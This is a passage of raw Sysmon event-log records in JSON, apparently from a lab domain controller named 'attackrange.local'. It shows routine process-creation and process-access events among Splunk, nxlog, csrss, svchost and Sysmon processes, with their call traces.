(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.387","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nProcessGuid: {E2A3D6B1-10F1-5F25-0000-001095480500}\r\nProcessId: 4780\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","ProcessGuid":"{E2A3D6B1-10F1-5F25-0000-001095480500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10F1-5F25-0000-001095480500}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10F1-5F25-0000-001095480500}","TargetProcessId":"4780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10F1-5F25-0000-001095480500}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10F1-5F25-0000-001095480500}","TargetProcessId":"4780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 